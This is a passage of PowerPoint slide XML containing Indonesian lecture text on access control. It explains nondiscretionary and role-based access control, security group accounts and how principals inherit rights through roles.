              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nondiskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penugasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksplisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskresi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kepala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>RBAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukanlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditugaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh administrator dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewarisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
